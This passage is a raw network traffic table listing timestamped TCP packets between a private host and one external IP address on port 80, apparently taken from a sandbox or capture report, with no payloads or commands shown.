Nov 26, 2022 11:17:42.546189070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546194077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546217918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546235085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546241045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546248913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546264887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546266079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546287060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546288967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546314001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546314955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546338081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546338081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546360970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546361923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546385050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546391010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546405077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546407938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546430111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546435118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546452045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546456099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546475887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546479940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546500921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546504021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546520948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546525955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546550035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546551943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546567917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546571970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546596050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546602964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546616077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546619892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546643019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546647072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546664953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546667099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546689987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546691895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546709061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546714067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546736956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546741962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546760082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546770096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546782970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546799898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546799898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546807051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546825886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546829939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546853065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546864986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546888113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546894073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546894073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546912909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546936989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546941042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546958923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546962976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.546981096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.546986103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547008038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547008991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547024012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547032118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547051907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547056913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547074080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547080040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547121048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547132969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547152996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547158003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547171116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547180891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547199965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547205925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547216892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547229052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547246933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547252893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547275066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547277927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547291040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547297955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547317028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547321081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547338963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547344923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547360897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547368050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.547388077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.547406912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.558322906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558355093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558373928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558393955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558414936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.558454037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.558494091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558514118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558532000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558552027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558568001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.558571100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.558603048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.558654070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.559132099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.559153080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.559184074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.559205055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.559262037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.559293985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.559324980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.559341908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.559691906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.559751034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.560714006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.560766935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.560770988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.560811043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.560822964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.560846090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.560868979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.560919046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.560951948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561089039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561158895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561347961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561369896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561393023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561414003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561429024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561439037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561458111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561465979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561480999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561500072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561502934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561525106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561530113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561546087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561547041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561568022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561574936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561589003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561589956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561609983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561614037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561629057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561630964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561651945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561652899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561671972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561676025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561697006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.561697960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561713934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.561743021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563075066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563098907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563121080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563143969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563163042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563193083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563290119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563333988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563339949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563373089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563471079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563493013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563513994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563519001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563534975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563539028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563555002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563559055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563576937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563580036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563606977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563610077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563632011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.563632011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563646078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.563672066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564080000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564112902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564136028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564148903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564166069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564202070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564203024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564287901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564342976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564367056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564388990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564416885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564431906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564543009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564591885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564599991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564615965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564637899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.564637899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564665079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.564675093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.565785885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.565840006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.565861940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.565861940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.565885067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.565913916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.565924883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.565953970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.565962076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566004992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566008091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566066980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566095114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566117048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566138029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566145897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566159010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566159964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566174984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566263914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566279888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566319942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566340923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566342115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566356897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566364050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566385984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566389084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566404104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566409111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566431046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566447973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566461086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566493034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566502094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566545963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566581964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566637039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566742897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566783905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566837072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.566891909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.566946030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567015886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567070007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567111015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567116022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567133904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567152023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567179918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567198992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567223072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567244053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567249060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567259073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567265987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567289114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567291021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567311049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567311049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567332983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567333937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567354918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567356110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567375898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567377090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567398071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567399979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567420959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567429066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567440987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567441940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567462921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567481041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567483902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567504883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567506075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567526102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567544937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567548037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567570925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567575932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567590952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567595959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567611933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567619085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567636013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567636967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567657948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567675114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567675114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567675114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567679882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567694902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567702055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567725897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567734957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567747116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.567759991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567770958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.567786932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568085909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568130016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568150997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568175077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568186998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568207979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568231106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568300009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568352938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568382025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568425894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568701029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568762064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568783045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568784952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568804979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568805933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568826914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568829060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568841934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.568846941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.568870068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569027901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569046021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569061041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569065094 CET	80	49707	66.235.200.147	192.168.2.5
